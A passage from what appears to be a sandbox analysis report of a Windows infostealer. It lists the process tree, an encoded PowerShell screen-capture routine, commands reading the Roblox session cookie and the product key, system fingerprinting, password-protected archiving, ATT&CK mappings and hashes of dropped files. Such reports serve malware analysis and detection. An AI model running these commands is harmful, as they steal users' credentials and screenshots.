      C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
      4⤵
      PID:5736
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        5⤵
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1032
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nalcwsai\nalcwsai.cmdline"
        6⤵
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        
        PID:5544
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC256.tmp" "c:\Users\Admin\AppData\Local\Temp\nalcwsai\CSC6AA51585D29A47259DC6CE38FEFD3C6.TMP"
        7⤵
        
        PID:5304
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:5196
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:2212
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
      4⤵
      PID:3864
    - - C:\Windows\system32\attrib.exe
        
        attrib -r C:\Windows\System32\drivers\etc\hosts
        5⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:3140
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
      4⤵
      PID:1940
    - - C:\Windows\system32\attrib.exe
        
        attrib +r C:\Windows\System32\drivers\etc\hosts
        5⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:4016
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:3836
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:1028
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:3300
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Loads dropped DLL
        Enumerates processes with tasklist
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:920
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:2828
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:1260
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:2712
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:1668
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:5576
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5564
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:716
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Command and Scripting Interpreter: PowerShell
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3736
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:1124
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2928
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "getmac"
      4⤵
      PID:780
    - - C:\Windows\system32\getmac.exe
        
        getmac
        5⤵
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        
        PID:1768
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI28562\rar.exe a -r -hp"1" "C:\Users\Admin\AppData\Local\Temp\utRNW.zip" *"
      4⤵
      PID:5004
    - - C:\Users\Admin\AppData\Local\Temp\_MEI28562\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI28562\rar.exe a -r -hp"1" "C:\Users\Admin\AppData\Local\Temp\utRNW.zip" *
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        
        PID:2880
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
      4⤵
      PID:2940
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        5⤵
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4800
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
      4⤵
      PID:3456
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        5⤵
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        
        PID:1232
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:2276
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        
        PID:4824
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
      4⤵
      PID:3572
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5236
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:1380
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        Suspicious behavior: EnumeratesProcesses
        
        PID:4084
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
      4⤵
      PID:4172
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        5⤵
        
        PID:5616

C:\Windows\Web\xdwdDelta.exe
C:\Windows\Web\xdwdDelta.exe
1⤵
- Executes dropped EXE
PID:1636

C:\Windows\Web\xdwdDelta.exe
C:\Windows\Web\xdwdDelta.exe
1⤵
- Executes dropped EXE
PID:2428

C:\Windows\Web\xdwdDelta.exe
C:\Windows\Web\xdwdDelta.exe
1⤵
- Executes dropped EXE
PID:408

C:\Windows\Web\xdwdDelta.exe
C:\Windows\Web\xdwdDelta.exe
1⤵
- Executes dropped EXE
PID:4808

C:\Windows\Web\xdwdDelta.exe
C:\Windows\Web\xdwdDelta.exe
1⤵
- Executes dropped EXE
PID:984

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Event Triggered Execution

T1546

AppInit DLLs

T1546.010

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Event Triggered Execution

T1546

AppInit DLLs

T1546.010

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
ac4917a885cf6050b1a483e4bc4d2ea5

SHA1
b1c0a9f27bd21c6bbb8e9be70db8777b4a2a640f

SHA256
e39062a62c3c7617feeeff95ea8a0be51104a0d36f46e44eea22556fda74d8d9

SHA512
092c67a3ecae1d187cad72a8ea1ea37cb78a0cf79c2cd7fb88953e5990669a2e871267015762fd46d274badb88ac0c1d73b00f1df7394d89bed48a3a45c2ba3d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
1bce4814e36b7a4be50fb57b9eb25f07

SHA1
4a01cd50845904edfe1d07bb71d699b7af2dc545

SHA256
a376fbdc8ec7b8366790a2a83ad3addd3f03310c333eabb0076200c51af3e3bb

SHA512
0b8159757eb1083dacaf87a547a543aaf761574cb003c86205299ae939b0e5434cf37b4204d7e75ff7cd5f659e0bafaa66fd7b83f324485769af215447130fbc

Download Submit
C:\Users\Admin\AppData\Local\Temp\ThirdPartyGUI.exe

Filesize
524KB

MD5
96df2c150cb74469cc7c9cb0a02ae03a

SHA1
e01c55d58423d9bde789adb67e49d1d0ab6c4b82

SHA256
8ac9d08ab8d9c957ad17c2fc88a52ce95ecf212a56c6371e9b28584d97e00017

SHA512
b7ebdc92c303d1282495a315df618deb228718fd45ba21d053e75b0bd93c4f0054220e4abc083d8828f3cd826bb05cfc75313dbc9123499659b43cc3a2a282a7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28562\VCRUNTIME140.dll

Filesize
117KB

MD5
862f820c3251e4ca6fc0ac00e4092239

SHA1
ef96d84b253041b090c243594f90938e9a487a9a

SHA256
36585912e5eaf83ba9fea0631534f690ccdc2d7ba91537166fe53e56c221e153

SHA512
2f8a0f11bccc3a8cb99637deeda0158240df0885a230f38bb7f21257c659f05646c6b61e993f87e0877f6ba06b347ddd1fc45d5c44bc4e309ef75ed882b82e4e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28562\_ctypes.pyd

Filesize
63KB

MD5
b6262f9fbdca0fe77e96a9eed25e312f

SHA1
6bfb59be5185ceaca311f7d9ef750a12b971cbd7

SHA256
1c0f9c3bdc53c2b24d5480858377883a002eb2ebb57769d30649868bfb191998

SHA512
768321758fc78e398a1b60d9d0ac6b7dfd7fd429ef138845461389aaa8e74468e4bc337c1db829ba811cb58cc48cfff5c8de325de949dde6d89470342b2c8ce8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28562\api-ms-win-core-console-l1-1-0.dll

Filesize
12KB

MD5
e8603a2f776c3ca7cf7f8020dcc0e282

SHA1
deca6d124f93ee2948a46f9314ce6cccdb784993

SHA256
8d467e0f39fac26b03ef5bb031e742f811e86cff544a7dfb16a1bec7df5e52fb

SHA512
5b3ddfd3f9daad1aa3c11aeee29382c5efeb616c2a0d3cd28f821b2c75f25902b7e613a1e616584ce005ffd31491546eb717641a5c5d27b9de9f4be1174e71bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28562\api-ms-win-core-datetime-l1-1-0.dll

Filesize
11KB

MD5
b96c8b4bb9fb8a6cedde1ee351255ece

SHA1
0ab3e4e516f4243f11966cd31bd0cc9d8ca099b5

SHA256
c5ddad487f2ea9dfa5f88eefbaf59672f6415ec6e21d7f89c0b98a3e6fa385c8

SHA512
e570e37ce7a57c57065f1b2b8d83e47c671f22737b042fad19c141827f8d7a13616f8dade6e19ab4992123412f7630847ec09203b04687e04ab181812b4c19af

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28562\api-ms-win-core-debug-l1-1-0.dll

Filesize
11KB

MD5
5a418164da0181b861c0db7bdedde0ab

SHA1
d07ebcf3921305e55904d42c63614f0d04f610cf

SHA256
01f1f800090f9dd6dcfbe00358cd5241432bff22799e01cd82a1dd70b6c5c854

SHA512
0e381b767a75dedfae8dfd214f0c67338e29fab7c9d59ae65e19eebb2585f2b8bf5c36cefa65b7e1f224810a059b7bfbec394f3a3ae5a84215617dcb6b20a04a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28562\api-ms-win-core-errorhandling-l1-1-0.dll

Filesize
11KB

MD5
e03b6117854adb2de4f39a6db5261ee7

SHA1
b4221a144d25609e6f0389d14cb3faad4f8f7cce

SHA256
ef1bd8bfcc9cd818232cd987eeec3331f5a3e6b2d3dc22ba3b01332240dcec8e

SHA512
9fc9b3c34ffb9d77873584124d1992d9e333b2f8c0b01f15ca394d468be3747a6e65cdb1ba6fef174740681dceb42590538447fe03e8ad22c35f3ab5ebd5ca8f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28562\api-ms-win-core-file-l1-1-0.dll

Filesize
15KB

MD5
616e360ccb52b5e814942a294b718ac0

SHA1
5583b54e59197797d0ba6f6377bff09796d7860a

SHA256
1ec3bdf1ccaca79165a9669126a632ad4b37b29f8c2c89c63e6391c36deeddbb

SHA512
0048df43100a57936da44e3b85b57c51d00b09fda52fb483d00afcbff35ab2a0c2185404b4c68d081ff5ca2b2cb91526c61057ac7b1aeaafee32999227089535

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28562\api-ms-win-core-file-l1-2-0.dll

Filesize
11KB

MD5
9552fdb73fe453fdb69e794d06b2ee61

SHA1
178e278fa9dc3ac7224bcd74722b19dd7aa70edb

SHA256
064c7b10c031d09a2b53bad9b77fd12ab20681531aa228f4bc84200f0391c75c

SHA512
48fc32dbf52bddb880ad9ca3f8004a95facc81ea4a6c942785fb80488e1a94f8b29881e19737959b628b0029f1b4ad562a19414e5bc59de04a7f683824ea0f2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28562\api-ms-win-core-file-l2-1-0.dll

Filesize
11KB

MD5
726f825f41da2f50b7bf4e77c6270268

SHA1
d11a55a4972f37d244a965579abea2fdd6db167f

SHA256
1f904737b907864e16a74426f0af57dabf5cb105ae68bae5971afc3f3959cb2b

SHA512
361c25f553fc8040d6c837e18f84810c860d466831749db0a68281e888d0236111176aaa0f19af06d4810d70399264a0c7aa98cedad3171138b7000b2a33a921

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28562\api-ms-win-core-handle-l1-1-0.dll

Filesize
11KB

MD5
ded2e9db823f1ec0a4c8173a448a62a3

SHA1
81fd42787cf0b5c4593f70c7202d5d4e1f687b17

SHA256
d951b189217e3fa7ca4f6ddb12609dc12c953fc577b758d699b20d510c6049e4

SHA512
5d92ed0a6098080f377e2cfff5346c56d7d65579568bb5521f1149e6a0c3c5a1d9f6057ee0e03ea130a2ab63fd85e945e025fe44645db6ecea613810fd452619

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28562\api-ms-win-core-heap-l1-1-0.dll

Filesize
12KB

MD5
91eb4f8102e9a6b10eb4c25c19ad527f

SHA1
7ace95447cd7a52196163c878ccf5fccf270e404

SHA256
987743a0a64900d8a381794a25ccfe1baca3cfae2148c5b91ac94265b28f66a2

SHA512
